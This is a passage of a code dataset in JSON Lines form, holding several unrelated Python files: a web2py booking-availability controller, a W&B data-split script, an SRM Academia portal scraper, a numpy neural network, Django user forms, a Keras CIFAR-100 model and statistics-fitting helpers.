'%Y-%m-%d').date()\n to_date = datetime.datetime.strptime(request.vars['to'], '%Y-%m-%d').date()\n\n # find overlapping bookings - each row is a person for a time range\n rows = db(~(db.bed_reservations_safe.departure_date <= from_date) &\n ~(db.bed_reservations_safe.arrival_date >= to_date)).select()\n\n # find the maximum number of beds booked:\n # i) range of dates for each overlapping booking within\n # the query window\n dates = [date_range(max(from_date, r.arrival_date),\n min(to_date, r.departure_date))\n for r in rows]\n # ii) unpack and get availability, truncating at zero.\n dates = Counter([dt for bk in dates for dt in bk])\n if list(dates.values()):\n n_taken = max(dates.values())\n else:\n n_taken = 0\n\n n_avail = max(0, n_beds_available - n_taken)\n\n # return the availability\n return json(dict(avail_msg='{} beds available at SAFE'.format(n_avail)))\n except Exception:\n return json(dict(avail_msg='Bed availability could not be verified'.format(n_avail)))\n\n\n@service.json\ndef get_project_dates():\n try:\n # get the variables from the call\n project_id = request.vars['project_id']\n rec = db(db.project_details.project_id == project_id).select().first()\n\n # return the availability\n return json(dict(found=True,\n start=rec.start_date.isoformat(),\n end=rec.end_date.isoformat()))\n except Exception:\n start_date = (datetime.date.today() + 
datetime.timedelta(days=14))\n end_date = (datetime.date.today() + datetime.timedelta(days=365))\n return json(dict(found=False,\n start=start_date.isoformat(),\n end=end_date.isoformat()))\n\n\n@service.json\ndef check_transfer_availability():\n # get the variables from the call\n date = request.vars['date']\n\n existing_res = db(db.transfers.transfer_date == date).count()\n\n # return the availability\n return json(dict(n_avail=n_transfers_available - existing_res))\n","repo_name":"ImperialCollegeLondon/safe_web","sub_path":"controllers/research_visits.py","file_name":"research_visits.py","file_ext":"py","file_size_in_byte":112601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42732187461","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport tempfile\n\nimport hydra\nfrom omegaconf import DictConfig\n\nimport pandas as pd\nimport wandb\nfrom sklearn.model_selection import train_test_split\n\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\n@hydra.main(config_name='config')\ndef go(config: DictConfig):\n\n wandb.login(key=config['wandb']['api_key'])\n run = wandb.init(project=config['wandb']['project'], job_type=config['wandb']['job_type'])\n\n logger.info(\"Downloading and reading artifact\")\n artifact = run.use_artifact(config['artifact']['input'])\n artifact_path = artifact.file()\n\n df = pd.read_csv(artifact_path, low_memory=False)\n\n # Split model_dev/test\n logger.info(\"Splitting data into train and test\")\n splits = {}\n\n ###################################\n # COMPLETE the following line #\n ###################################\n\n splits[\"train\"], splits[\"test\"] = train_test_split(\n df,\n test_size=config['parameters']['test_size'],\n random_state=config['parameters']['random_state'],\n stratify=df[config['parameters']['stratify']] if config['parameters']['stratify'] != 'null' else None,\n )\n\n # Now we save the artifacts. We use a temporary directory so we do not leave\n # any trace behind\n with tempfile.TemporaryDirectory() as tmp_dir:\n\n for split, df in splits.items():\n\n # Make the artifact name from the provided root plus the name of the split\n artifact_name = f\"{config['artifact']['output_root_name']}_{split}.csv\"\n\n # Get the path on disk within the temp directory\n temp_path = os.path.join(tmp_dir, artifact_name)\n\n logger.info(f\"Uploading the {split} dataset to {artifact_name}\")\n\n # Save then upload to W&B\n df.to_csv(temp_path)\n\n artifact = wandb.Artifact(\n name=artifact_name,\n type=config['artifact']['type'],\n description=f\"{split} split of dataset {config['artifact']['input']}\",\n )\n artifact.add_file(temp_path)\n\n logger.info(\"Logging artifact\")\n run.log_artifact(artifact)\n\n # This waits for the artifact to be uploaded to W&B. 
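(wait() blocks until the artifact has finished logging.) 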
If you\n # do not add this, the temp directory might be removed before\n # W&B had a chance to upload the datasets, and the upload\n # might fail\n artifact.wait()\n\n\nif __name__ == \"__main__\":\n go()\n","repo_name":"AndreaCaliandro/mlops","sub_path":"lesson-2-data-exploration-and-preparation/exercises/exercise_6/starter/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16129577793","text":"import json\nfrom urllib.parse import parse_qs\nfrom bs4 import BeautifulSoup\nimport requests\nfrom pandas import read_html,isna\nimport re\n\n\n\n\ndef Get_SRMacad_Details(email : str , passwd : str):\n if(email == None or passwd == None):\n return \"Please provide email and password in the header\"\n \n curSession = requests.Session() \n # all cookies received will be stored in the session object\n\n curSession.get(\"https://academia.srmist.edu.in/\")\n\n headers = {\n 'Accept': '*/*',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Origin': 'https://academia.srmist.edu.in',\n 'Referer': 'https://academia.srmist.edu.in/accounts/signin?_sh=false&hideidp=true&portal=10002227248&client_portal=true&dcc=true&servicename=ZohoCreator&service_language=en&serviceurl=https%3A%2F%2Facademia.srmist.edu.in%2F',\n 'Sec-Fetch-Dest': 'empty',\n 'Sec-Fetch-Mode': 'cors',\n 'Sec-Fetch-Site': 'same-origin',\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Mobile Safari/537.36',\n 'sec-ch-ua': '\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"',\n 'sec-ch-ua-mobile': '?1',\n 'sec-ch-ua-platform': '\"Android\"',\n }\n\n data = {\n 'username': email,\n 'password': passwd,\n 'client_portal': 'true',\n 'dcc': 'true',\n 'serviceurl': 'https://academia.srmist.edu.in/',\n 'servicename': 'ZohoCreator',\n 'portal': '10002227248',\n 'service_language': 'en',\n 'is_ajax': 'true',\n 'grant_type': 'password',\n }\n\n response = curSession.post('https://academia.srmist.edu.in/accounts/signin.ac', headers=headers, data=data)\n json_data = json.loads(response.text)\n \n if json_data.get('error') != None:\n return json_data\n\n headers = {'Origin': 'https://academia.srmist.edu.in',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36' }\n params = parse_qs(json_data['data']['token_params'])\n params['state'] = 'https://academia.srmist.edu.in/'\n r = curSession.get(json_data['data']['oauthorize_uri'], data=params, headers=headers)\n\n attendanceURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/My_Attendance\"\n attendancePage = curSession.get(attendanceURL).text\n\n TimetableURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/My_Time_Table_2022_23\"\n TimetablePage = curSession.get(TimetableURL).text\n \n # AcademicPlannerODDURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/Academic_Planner_2022_23_ODD\"\n # AcademicPlannerOddPage = curSession.get(AcademicPlannerODDURL).text\n\n # AcademicPlannerEVENURL = \"https://academia.srmist.edu.in/srm_university/academia-academic-services/page/Academic_Planner_2021_22_EVEN\"\n # AcademicPlannerEvenPage = curSession.get(AcademicPlannerEVENURL).text\n \n # Prettify Output\n 
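 # The scraped pages embed unicode escape sequences as plain text; the\n # encode('raw_unicode_escape').decode('unicode_escape') round-trip below converts\n # them back into real characters (run twice, apparently for doubly-escaped payloads).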
attendancePage = attendancePage.encode('raw_unicode_escape').decode('unicode_escape')\n attendancePage = attendancePage.encode('raw_unicode_escape').decode('unicode_escape')\n\n TimetablePage = TimetablePage.encode('raw_unicode_escape').decode('unicode_escape')\n TimetablePage = TimetablePage.encode('raw_unicode_escape').decode('unicode_escape')\n\n\n # Remove Unwanted Parts\n\n TimetablePage\n # '<table' / '</table>' below are generic stand-in markers for the page-specific\n # search strings; they bracket the block that gets sliced out\n a = TimetablePage.find('<table')\n b = TimetablePage.find(\"</table>\")\n TimetablePage = TimetablePage[a:b]\n\n # AttendancePage\n a = attendancePage.find('<table')\n b = attendancePage.find('</table>')\n attendancePage = attendancePage[a:b]\n \n # Page to Soup\n attendancePageSoup = BeautifulSoup(attendancePage , 'html5lib')\n TimetablePageSoup = BeautifulSoup(TimetablePage , 'html5lib')\n table = attendancePageSoup.find_all('table')\n # Get User Details\n details = attendancePageSoup.find_all(\"td\")[:14]\n User_Info = {}\n fieldName = None\n for idx,data in enumerate(details):\n if idx % 2 == 0:\n fieldName = data.text\n User_Info[fieldName] = None\n continue\n User_Info[fieldName] = data.text\n # A variable that is not defined.\n # UserInfo\n # Get FieldName\n Field_Name = []\n Column_name = table[1].find_next('tr').find_all('td')\n for tableData in Column_name:\n Field_Name.append(tableData.text)\n # FieldName = json.dumps(Field_Name)\n # Attendance Scraping\n attendance_details = {}\n data = table[1].find_all('tr')[1:]\n for tableRow in data:\n info = []\n for name in tableRow.findAll('td'):\n info.append(name.text)\n if info[2] == 'Practical':\n attendance_details[tableRow.find_next('td').text[:9] + 'P'] = info\n else:\n attendance_details[tableRow.find_next('td').text[:9]] = info\n # Attendance = json.dumps(attendance_details)\n \n # SubjectCode with Subject Name\n data = table[1].find_all('tr')[1:]\n subjectCode = {}\n for tableRow in data:\n data = tableRow.find_all('td')\n subject_code = data[0].text[:9]\n name = data[1].text\n subjectCode[subject_code] = name\n \n # Get mark FieldName\n Marks_Field_Name = []\n Column_name = table[2].find_next('tr').find_all('td')\n for tableData in Column_name:\n Marks_Field_Name.append(tableData.text)\n # MarksFieldName = json.dumps(Marks_Field_Name)\n # MarksFieldName\n \n # Scraping marks\n df = read_html(table[2].prettify() , flavor='html5lib')\n odd = [i for i in range(2 , len(df[0])) if i % 2 == 0]\n df1 = df[0].drop(odd)\n df1[2].fillna(value = \"None\",inplace = True)\n\n def getMarks(i):\n MarkList = re.findall(r\"\\d+\\.\\d+\", i)\n MarkList = [float(mark) for mark in MarkList]\n return MarkList\n\n mark_details = {}\n # if len(df1) < 2 return mark_details\n for i in df1.index:\n if i == 0: continue\n if isna(df1[2][i]): df1[2][i] = 'No Data'\n subject_code = df1[0][i]\n subject_name = subjectCode.get(subject_code) if subjectCode.get(subject_code) != None else subject_code\n if mark_details.get(subject_name) == None:\n mark_details[subject_name] = getMarks(df1[2][i])\n else:\n mark_details[subject_name + ' Practical'] = getMarks(df1[2][i])\n # markDetails = json.dumps(mark_details)\n # markDetails\n \n \n \n \n # Fetch Faculty Details\n TimeTableToDF = read_html(TimetablePageSoup.find_all('table')[1].prettify() , flavor='html5lib')\n TimeTableToDF[0].fillna(value = \"None\",inplace = True)\n FacultyInfo = TimeTableToDF[0].loc[:].values.tolist()[1:-1]\n # FacultyInfo\n \n Details = {}\n Details['attendanceFieldName'] = Field_Name\n Details['attendance'] = attendance_details\n Details['userInfo'] = User_Info\n Details['marks'] = mark_details\n Details['facultyInfo'] = FacultyInfo\n Details['SubcodetoName'] = subjectCode\n \n \n \n Details = json.dumps(Details)\n return Details\n","repo_name":"ayushhsinghh/SRMAcademiaAPI","sub_path":"SRMacad.py","file_name":"SRMacad.py","file_ext":"py","file_size_in_byte":7937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21674950931","text":"import numpy as np\nfrom .Functions import ActivFunction, LossFunction, Identity\n\n\nclass NN_model:\n def __init__(\n self,\n layers: list,\n activ_f: ActivFunction,\n loss_f: LossFunction,
output_f: ActivFunction = Identity,\n ):\n \"\"\"Feed-forward NN model.\n\n Args:\n layers (list): number of units per layer.\n activ_f (ActivFunction): activation function for the hidden layers.\n loss_f (LossFunction): loss function.\n output_f (ActivFunction): activation function for the output layer.\n Defaults to `Identity`.\n \n Examples\n --------\n Here X and Y are lists of `numpy` vectors, with lengths 4 and 2 respectively.\n >>> model = NN_model([4, 5, 3, 2], Sigmoid, MSE)\n >>> model.init_weights()\n >>> for i in range(len(X)):\n ... model.zero_grad()\n ... out = model(X[i])\n ... loss = model.loss(Y[i])\n ... print(loss)\n ... g = model.grad().get_grad()\n ... model.Weights = model.Weights - 0.5*g\n ...\n \"\"\"\n # input layer does not count\n n_layers = len(layers) - 1\n # for each layer, a matrix of weights\n self.weights = []\n # D_weights[i] is the gradient of the Loss w.r.t. weights[i]\n self.D_weights = []\n for i in range(n_layers):\n fan_in = layers[i]\n fan_out = layers[i + 1]\n fan_in += 1 # for the layer bias\n shape = (fan_out, fan_in)\n w = np.zeros(shape)\n D_w = np.zeros(shape)\n self.weights.append(w)\n self.D_weights.append(D_w)\n\n self.activ_fs = [activ_f() for i in range(n_layers - 1)]\n # output layer activation (Identity by default)\n self.activ_fs.append(output_f())\n self.loss_f = loss_f()\n # for each layer, keep track of the output\n self.outs = [None] * n_layers\n # D_outs[i] is the gradient of the Loss w.r.t. outs[i]\n self.D_outs = [None] * n_layers\n # keep track of the last input to the model\n self.input = None\n\n def init_weights(self):\n n_layers = len(self.weights)\n # Glorot's initialization\n for i in range(n_layers):\n shape_i = self.weights[i].shape\n fan_in = shape_i[1]\n fan_out = shape_i[0]\n a = 6 / (fan_in + fan_out)\n a = np.sqrt(a)\n self.weights[i] = np.random.uniform(low=-a, high=a, size=shape_i)\n\n @property\n def Weights(self):\n total_weights = [w.ravel() for w in self.weights]\n return np.concatenate(total_weights)\n \n @Weights.setter\n def Weights(self, ws):\n p = 0\n n_layers = len(self.weights)\n for i in range(n_layers):\n size = self.weights[i].size\n slice = ws[p : p + size]\n self.weights[i] = slice.reshape(self.weights[i].shape)\n p += size\n\n def __call__(self, input: np.ndarray) -> np.ndarray:\n self.input = np.append(input, [1.0]) # for bias\n n_layers = len(self.weights)\n\n # first layer\n ls_in = np.dot(self.weights[0], self.input)\n self.outs[0] = self.activ_fs[0](ls_in)\n self.outs[0] = np.append(self.outs[0], [1.0]) # bias\n # other layers\n for i in range(1, n_layers):\n ls_in = np.dot(self.weights[i], self.outs[i - 1])\n self.outs[i] = self.activ_fs[i](ls_in)\n if i < n_layers - 1:\n self.outs[i] = np.append(self.outs[i], [1.0]) # bias\n # return output of last layer\n return self.outs[-1]\n\n def loss(self, target: np.ndarray):\n x = self.outs[-1]\n return self.loss_f(x, target)\n\n def grad(self):\n \"\"\"Compute and store (by summing) the gradient of the weights\n w.r.t.
the last loss value computed.\n \"\"\"\n n_layers = len(self.weights)\n\n loss_grad = self.loss_f.grad\n self.D_outs[-1] = loss_grad\n\n # loop in reverse, up to first hidden layer (excluded)\n for i in reversed(range(1, n_layers)):\n g = self.D_outs[i] * self.activ_fs[i].grad\n self.D_weights[i] += np.outer(g, self.outs[i - 1])\n # remove bias column and transpose\n wT = self.weights[i][:, :-1].transpose()\n self.D_outs[i - 1] = np.dot(wT, g)\n\n # first hidden layer uses self.input\n g = self.D_outs[0]\n g = g * self.activ_fs[0].grad\n self.D_weights[0] += np.outer(g, self.input)\n return self\n\n def get_grad(self):\n \"\"\"Return the currently stored gradient.\"\"\"\n total_gradient = [Dw.flatten() for Dw in self.D_weights]\n total_gradient = np.concatenate(total_gradient)\n return total_gradient\n\n def zero_grad(self):\n \"\"\"Set the stored gradient to zero.\"\"\"\n for D_w in self.D_weights:\n D_w.fill(0.0)\n","repo_name":"michelebersani/ComputationalMathematics","sub_path":"NN/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"39376756783","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom directory.models import Competitors\nfrom admin_panel.models import *\n\n\nclass CustomCreationForm(UserCreationForm):\n \"\"\"Форма регистрации пользователя\"\"\"\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'password1']\n\n def save(self):\n user = super(CustomCreationForm, self).save(commit=True)\n Profile.objects.create(\n user=user,\n access_level=AccessLevel.objects.get(id=3)) # Права по умолчанию\n return user\n\n\nclass CustomUpdateUserForm(UserChangeForm):\n \"\"\"Форма редактирования профиля пользователя\"\"\"\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email']\n\n def save(self, level_id, competitor=None):\n user = super(CustomUpdateUserForm, self).save(commit=True)\n access_level = AccessLevel.objects.get(level=level_id)\n try:\n profile = Profile.objects.get(user=user)\n profile.access_level = access_level\n profile.save()\n if competitor:\n competitor = Competitors.objects.get(pk=competitor)\n profile.competitor = competitor\n profile.save()\n else:\n profile.competitor = None\n profile.save()\n except Profile.DoesNotExist:\n Profile.objects.create(user=user, access_level=access_level)\n return user\n","repo_name":"mnmyasis/fedor_app","sub_path":"fedor/admin_panel/services/forms/create_update_user_forms.py","file_name":"create_update_user_forms.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74144022912","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom iminuit import Minuit\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nimport sympy as sp\nimport seaborn as sb\nfrom ExternalFunctions import Chi2Regression\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[99]:\n\n\ntest = 10*np.array([2.69,2.71,2.56,2.48,2.34,2.79,2.54,2.68,2.69,2.58,2.66,2.70])\nerrs = [1,1,1,1,1,1,1,1,0.01,1,1,1,]\n\n\n# In[39]:\n\n\ndef weighted_avg(y,x=None,yerr = None,ax = None,label=\"Data\",col = \"k\"):\n if not x:\n x = 
range(len(y))\n if not yerr:\n yerr = np.ones(len(y))*np.std(y)\n func = lambda x,a: a + 0*x\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,a=1)\n mi.migrad()\n a = mi.args[0]\n err = mi.errors[0]\n xx = np.linspace(min(x),max(x),1000)\n \n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,a),ls='--',c='b',label = \"Average: ${:.3}\\pm{:.3}$\".format(a,err))\n ax.legend()\n \n return mi,ax\n\n\n# In[78]:\n\n\ndef fit_unit_gauss(x,y,yerr,muguess=None,ax=None,col='k',label = \"Data\"):\n if not muguess:\n muguess = (max(x)-min(x))/2\n func = lambda x,mu,sigma: stats.norm.pdf(x,mu,sigma)\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,mu = muguess,sigma = 1)\n mi.migrad()\n mu,sigma = mi.args\n \n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Gauss$(\\mu: {:.3},\\sigma: {:.3})$\".format(mu,sigma))\n ax.legend()\n \n return mi,ax\n\ndef fit_gauss(x,y,yerr,muguess=None,ax=None,col='k',label = \"Data\"):\n if not muguess:\n muguess = (max(x)-min(x))/2\n func = lambda x,mu,sigma,a: stats.norm.pdf(x,mu,sigma)*a\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,mu = muguess,sigma = 1,a=1)\n mi.migrad()\n mu,sigma,a = mi.args\n \n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Gauss$(\\mu: {:.3},\\sigma: {:.3})$\".format(mu,sigma))\n ax.legend()\n \n return mi,ax\n\n\n# In[74]:\n\n\n# testgauss = [185,1149,3265,5475,6114,5194,3067,1331,403,105,14,4]\n\n# t = fit_gauss(range(len(testgauss)),testgauss,np.sqrt(testgauss))\n\n\n# In[143]:\n\n\ndef chi2fit(x,y,yerr,func,guesses,label=\"Data\",ax=None,col='k',text=False,draw=True):\n chi = Chi2Regression(func,x,y,yerr)\n gstr = \"\"\n for key in guesses:\n gstr+=str(key)+\"=\"+str(guesses[key])+\",\"\n \n mistr = \"Minuit(chi,pedantic = False,print_level=0,\"+gstr+\")\"\n mi = eval(mistr)\n mi.migrad()\n \n if(draw):\n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n dstr = \"Fit values:\\n\"\n for i,key in enumerate(guesses):\n dstr+=str(key)+\"={:.3}$\\pm${:.3} \".format(mi.args[i],mi.errors[i])+\"\\n\"\n dstr+=\"\\n\"\n dstr+=\"$\\chi^2$={:.3}\\np-value={:.3}\".format(mi.fval,stats.chi2.sf(mi.fval,len(y)-len(guesses)))\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Fit\")\n if(text):\n ax.text(text[0],text[1],dstr,transform=ax.transAxes)\n ax.legend()\n \n return mi,ax\n \n\n\n# In[181]:\n\n\n# func = lambda x,a,b: a*x+b\n# x,y = range(len(test)),test\n# yerrs = errs\n# guesses = {\"a\":2,\"b\":3}\n# textpos =(0.8,0.05)\n# fig,ax =plt.subplots(figsize=(10,6))\n# mi,ax = chi2fit(x,y,yerrs,func,guesses,text=textpos,ax = ax)\n\n\n# In[222]:\n\n\ndef errorpropagate(func,symbols = None,correlation=None):\n if not symbols:\n symbols = func.free_symbols\n inner=0\n cor = 1\n for s in symbols:\n sig = sp.symbols(\"\\\\sigma_{\"+str(s)+\"}\")\n inner += sp.diff(func,s)**2*sig**2\n cor *= sp.diff(func,s)*sig\n if(correlation):\n inner+=2*cor*correlation\n return sp.sqrt(inner)\n\n\n# In[223]:\n\n\n# x,y,rho = sp.symbols(\"x y \\\\rho\")\n\n# 
errorpropagate(x*y**2,correlation=rho)\n\n\n# In[378]:\n\n\ndef from_same_dist(dist1,dist2,labels=None,text = None,ax = None):\n if not ax:\n fig,ax = plt.subplots()\n if not labels:\n labels = (\"Distribution 1\",\"Distribution 2\")\n h1,b1 = dist1\n h2,b2 = dist2\n \n b1,b2 = ((b1+np.roll(b1,1))/2)[1:],((b2+np.roll(b2,1))/2)[1:]\n ax.errorbar(b1,h1,np.sqrt(h1),fmt=\".\",capsize=2,label=labels[0])\n ax.errorbar(b2,h2,np.sqrt(h2),fmt=\".\",capsize=2,label=labels[1])\n \n ks = stats.ks_2samp(h1,h2)\n chi2 = 0\n for t1,t2 in zip(h1,h2):\n if(t2>0):\n chi2 += (t1-t2)**2/t2\n if(text): \n txt = \"KS-statistic:{:.3}\\nKS-p-value:{:.3}\\n\\n$\\chi^2$-statistic:{:.3}\\n$\\chi^2$ p-value:{:.3}\".format(ks[0],ks[1],chi2,stats.chi2.sf(chi2,2*len(h1)))\n ax.text(text[0],text[1],txt,transform=ax.transAxes)\n plt.legend()\n return ax,(chi2,stats.chi2.sf(chi2,2*len(h1))),ks\n\n\n# In[390]:\n\n\n# t1,t2 = np.random.normal(size=(2,1000))\n# d1 = np.histogram(t1,20,range=(-4,4))\n# d2 = np.histogram(t2,20,range=(-4,4))\n\n# from_same_dist(d1,d2,text=(0.1,0.6))\n\n\n# In[419]:\n\n\n# t1,t2,t3,t4 = np.random.normal(size=(4,1000))\n# t1+=3\n# t3+=3\n# d1 = np.concatenate((t1,t2))\n# d2 = np.concatenate((t3,t4))\n\ndef separate_two(d1,d2,separation=None):\n sb.jointplot(d1,d2,kind='kde')\n X = pd.DataFrame([d1,d2])\n X = X.transpose()\n X = StandardScaler().fit_transform(X)\n pca = PCA(n_components=2)\n Xfit = pca.fit_transform(X)\n principalDf = pd.DataFrame(data = Xfit\n , columns = ['principal component 1', 'principal component 2'])\n \n fig,ax = plt.subplots()\n s = principalDf['principal component 1']\n if separation!=None:\n dat1 = s[s<separation]\n dat2 = s[s>separation]\n ax.hist(dat1,bins=100)\n ax.hist(dat2,bins=100)\n else:\n ax.hist(principalDf['principal component 1'],bins=100)\n plt.show()\n \n if separation!=None:\n return (dat1,dat2),ax,Xfit\n return principalDf,ax,Xfit\n\n\ndef do_lda(dat1,dat2):\n X = np.vstack((dat1, dat2))\n N = len(dat1)\n y = np.zeros(2*N) \n y[:N] = 1\n \n # initialise the LDA method\n sklearn_lda = LDA(n_components=2)\n\n # fit the data\n sklearn_lda.fit(X, y)\n\n # transform the data\n X_lda_sklearn = sklearn_lda.transform(X) \n\n print(f\"LDA coefficients: {sklearn_lda.scalings_}\")\n\n# dat,ax,xfit = separate_two(d1,d2,0)\n\n\n# # In[271]:\n\n\n# h\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"JakobSchauser/Blok1Troels","sub_path":"JFuncs.py","file_name":"JFuncs.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36302189079","text":"from tensorflow.keras.datasets import cifar100\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D,Dense,Flatten, Dropout, MaxPooling2D\nfrom tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\n\n#1.
data\n\n(x_train,y_train), (x_test,y_test) = cifar100.load_data()\n\n#1) data 확인 \nprint(x_train.shape) # (50000, 32, 32, 3)\nprint(y_train.shape) # (50000, 1)\nprint(x_test.shape) #(10000, 32, 32, 3)\nprint(y_test.shape) # (10000, 1)\nprint(x_train[0]) # 32x32\nprint(y_train[0]) # [19]\n# print(np.unique(x_train[:2],return_counts=True)) # dtype=uint8\n# print(np.unique(y_train,return_counts=True)) # 클래스 100개 확인 완료\n\n\n#1) 정규화 (datasets 전처리)\n\n#1)) 실수형으로 변경\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n# y_train = y_train.flatten()\n# y_test = y_test.flatten()\n# print(y_train)\n\n\n#2)) 원-핫 인코딩\n# y_train = np_utils.to_categorical(y_train)\n# y_test = np_utils.to_categorical(y_test)\n# num_classes = y_test.shape[1]\n\n\nx_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train,\n train_size=0.8,\n random_state=42,\n shuffle=True,\n # y_train 훈련 (class)data 비율과 y_val 검증 (class)data 비율을 같게 함\n stratify=y_train\n)\n\n\n\ndatagen = ImageDataGenerator(\n # rotation_range=10,\n # zoom_range=0.1\n # shear_range=0.5,\n # width_shift_range=0.1,\n # height_shift_range=0.1,\n # horizontal_flip=True\n)\n\ndatagen.fit(x_train)\n\n\n\n#2. model\nmodel=Sequential()\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),input_shape=(32,32,3),activation='relu', padding='same'))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),activation='relu', padding='same')) \nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),activation='relu', padding='same')) \nmodel.add(Dropout(rate=0.5))\nmodel.add(Flatten()) \nmodel.add(Dense(512,activation='relu')) #inputshape = (batch_size, input_dim) -> 행무시 -> (40000,)로 표시\n #inputshape = (batch_size, input_dim)\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(100, activation='softmax'))\n\n\n\n\n\n\n\n#3. compile, training\nmodel.compile(\n loss='sparse_categorical_crossentropy',\n optimizer='adam',\n metrics=['acc']\n)\n\nimport time\n\nstart=time.time()\n\n\n\n\nearly_stoppong=EarlyStopping(\n monitor='val_loss',\n patience=10,\n verbose=2,\n restore_best_weights=True\n)\n\nimport datetime\n\nnow_date=datetime.datetime.now()\nnow_date=now_date.strftime(\"%m%d_%H%M\")\n\nmodel_checkpoint=ModelCheckpoint(\n filepath='c:/study/_save/MCP/' + 'K34_cifar100_' + now_date + '_{epoch}-{val_loss:.4f}.h5',\n monitor='val_loss',\n verbose=2,\n save_best_only=True\n)\n\n\nmodel.fit_generator(datagen.flow(x_train,y_train,batch_size=500),\n epochs=40,\n verbose=2,\n validation_data=(x_val, y_val),\n callbacks=[early_stoppong],\n shuffle=True,\n)\n\nend=time.time()\n\n\n\n\n\n#4. 
평가, 예측\n\nresults=model.evaluate(x_test,y_test)\n\n\nprint('loss : ',results[0]) # loss와 acc 값 2개 나옴\nprint('acc : ',results[1]) \nprint('걸린시간 : ',end-start)\n\n\n\n\n\"\"\"\nloss : 2.516951560974121\nacc : 0.37560001015663147\n걸린시간 : 92.03419232368469\n\ndrop rate 0.5로 변경\nloss : 2.35160493850708\nacc : 0.40470001101493835\n걸린시간 : 222.61408758163452\n\nloss : 2.312697410583496\nacc : 0.424699991941452\n걸린시간 : 229.69466423988342\n\n\nImageDataGenerator 추가 acc가 더 낮게 나옴\n0.3 나옴\n\nstratify 추가\n\n\n\n\n\n\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"zknight666/bit_study","sub_path":"keras/keras34_3_cifar100_2.py","file_name":"keras34_3_cifar100_2.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42098824350","text":"import math\n\n\nclass Calculator:\n\n def add(self, x, y):\n self.x = x\n self.y = y\n a = self.x + self.y\n return a\n\n def subtract(self, x, y):\n self.x = x\n self.y = y\n a = self.x - self.y\n return a\n\n def multiply(self, x, y):\n self.x = x\n self.y = y\n a = self.x * self.y\n return a\n\n def divide(self, x, y):\n self.x = x\n self.y = y\n\n if (y == 0):\n a = \"You can't divide by zero!\"\n else:\n a = self.x / self.y\n return a\n\n def potence(self, x, powP):\n self.x = x\n self.powP = powP\n return pow(x, powP)\n\n def 